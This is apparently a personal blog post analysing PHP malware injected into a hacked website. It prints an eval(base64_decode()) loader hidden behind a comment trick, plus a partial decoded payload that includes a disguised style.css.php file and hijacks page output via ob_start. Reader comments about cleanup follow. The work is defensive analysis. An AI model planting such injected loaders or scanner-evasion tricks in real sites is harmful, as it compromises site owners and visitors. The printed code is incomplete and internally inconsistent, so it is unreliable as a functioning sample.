Hacking the Code

Last Post i was talking about how to clean up a hacked web server, hopeful your server is clean now and you can get back to what you do best. But what was the hacker trying to do? What does that long string mean? I will tell you how to decode the string the safe way, and understand how it was constructed.

The Example that I am going to use is from a real hacked website, the code that I will display is only partial but the construct will be complete. Any identifiable URLs will be changed to prevent identification and your safety.
Lets start by identifying the code, this is what i had found at the very beginning of the page.
<? /**/eval(base64_decode(aWYoZnVuY3Rpb25<–>KTt9fX0=)); ?>

lets start with /**/, it looks innocent but its a way to hide the code, what the code usually used for is large blocks of comments instead of using // on each line you would start it with /* and  end with */ but what i noticed is that in bluefish and notepad++ when these are highlighted the whole line appears to be a comment, my guess is that other code scanners will look like one long comment  on that line and skip it. But this is just my conclusion and testing, very clever way to use comments.

almost forgot the first thing to notice is the use of short tags(<?) that they use, on my personal server I have short tags disabled, I had learned that it should be disabled for security purposes, I don’t know if this holds true today. but the reason they use it is it helps hide it as a comment adding php to   it (<?php),makes it show up as php code not a comment, now its starting to unravel………

evalEvaluate a string as PHP code

very simple right, they need something to run there code, eval does this trick, you can even add html to the string. just another peice of the pie.

base64_decode – it decodes base64 code, now what is base64? It was originally for email to send binary data in emails, and other uses like binary data in urls and other variables but newest use is hiding php code in a long string, the string was 2692 characters long. So what did that string have in it.

There is a lot of code i took out of these strings, the variables where 32 characters long each, and would have made this code even more cryptice than this slightly smaller version, but first lets go over the code line by line and find out what its doing.

if(function_exists(‘ob_start’)&&!isset($GLOBALS[‘sh_no’])){$GLOBALS[‘sh_no’]=1;
if(file_exists(‘/home/content/<—–>/admin/includes/languages/english/images/buttons/style.css.php’)){
include_once(‘/home/content/<——>/admin/includes/languages/english/images/buttons/style.css.php’);
if(function_exists(‘gml’)&&!function_exists(‘dgobh’)){
if(!function_exists(‘gzdecode’)){
function gzdecode($R20FD)
{$R6B6=ord(substr($R20FD,3,1));
$R6016=10;
$R0D54=0;
if($R6B6E&4)
{$R0D54=unpack(‘v’,substr($R20FD,10,2));
$R0D542=$R0D542[1];
$R6016+=2+$R0D542;}
if($R6B6E&8){$R60169=strpos($R20FD,chr(0),$R60169)+1;}
if($R6B6E98&16){$R60169=strpos($R20FD,chr(0),$R60169)+1;}
if($R6B6E98&2){$R60169+=2;}
$RC4A5B=gzinflate(substr($R20FD,$R60169));
if($RC4A5B===FALSE){$RC4A5B=$R20FD;}
return $RC4A5B;
}}
function dgobh($RDA3E){Header(‘Content-Encoding: none’);
$R3E33=gzdecode($RDA3E);
if(preg_match(‘/]*>)/si’,’$1′.gml(),$R3E33);}
else{
return gml().$R3E33;
}}
ob_start(‘dgobh’);
}}}

if(function_exists(‘ob_start’)&&!isset($GLOBALS[‘sh_no’])){$GLOBALS[‘sh_no’]=1; is the first line, and it starts by looking for ob_start, this functions is used to store items into a buffer, it can be used to store variables and strings, and then send them to the browser, but they are looking for it, next they are seeing if a global variable called ‘sho_no’ i am sure what this variable check is for but it sets it to 1 if it doesn’t exist. As a side note i will not be going into the logic, until all the functions are under stood.

After that it looks for style.css.php and if it exist include it, we will look into that file a little later, next is the gzdecode function, if it exists wonderful, and if it doesn’t it will make it. so what is gzdecode well the obvious answer would be it decodes gzencoded strings and files, and thats what they have done is encoded more strings but now with a different code, damn there getting tricky.

now the last great tidbit before going into the other files

function dgobh($RDA3E){Header(‘Content-Encoding: none’);
$R3E33=gzdecode($RDA3E);
if(preg_match( ‘/]*>)/si’ , ‘$1’.gml() , $R3E33);}
else{
return gml().$R3E33;
}}
ob_start(‘dgobh’);
}}}

now the function dgobh first changes the encoding to none which I am not too familer with, I will look into it and update later. Then it decodes its input, most likely a string, it runs next preg_match, it searches through a string and matches the regular expression, and one of my weak points is regualr expression. We also need to find out what gml() does and what it is returning.after that it sends dgobh to the buffer for use later on. There is more to this code than what i have currently, I will update some more as soon as i get the other file.


4 Responses to Hacking the Code

  1. my site affected with this code what can i do to rid off

    • there are 2 ways to get rid of the code, the first way is to manually go through all your files and and delete the code from those files and remove all uploaded files that the code references(IE config.php.css, or other similar css file). If your computer savy and have a linux server you could run the grep command to find all the files affected. The other way is to find a back up of your site before the attack happened or reload it from scratch.

      But this will all be for nothing if you don’t know where the attack entered from, if this hole is left open it will happen again

      Good luck!!

      Justin

      • I wonder if you can help at all.
        This morning (4th Oct) at 06:57, my site on a linux server was hacked with a virus leaving the following code above all php files in my site:

        I have been through many of the php files trying to delete it however it seems that it is on every single one and this is going to take me ages. I heard that you can run the grep command to find all the affected files on a linux server however I am entirely unsure how to go about this and would like further advice please as this is affecting me and my customers.

        Kind Regards,

        Richard

        • Richard –
          I’m sry that you were hacked, and best of luck. but what you are going to need to do is run “grep” to find all the files with the line and then use “sed” to delete the line from those files. or the other thing to do is run “sed” on all the files.
          to run these commands you will have to have ssh access to your server. you can find out more on how to activate it through your hosting company.

          I will try and put up the usage of the commands to help get rid of the code, hopefully later on tonight.

          as for your customers i would put up a temp site letting them know that you are doing maintenance and clean up the code. you should do this as soon as possible since your site is getting a malware page.
          then make sure the hackers access has been cut off, by turning off FTP, changing passwords.if you need more assistance feel free to email me.
          justinsolarski@gmail.com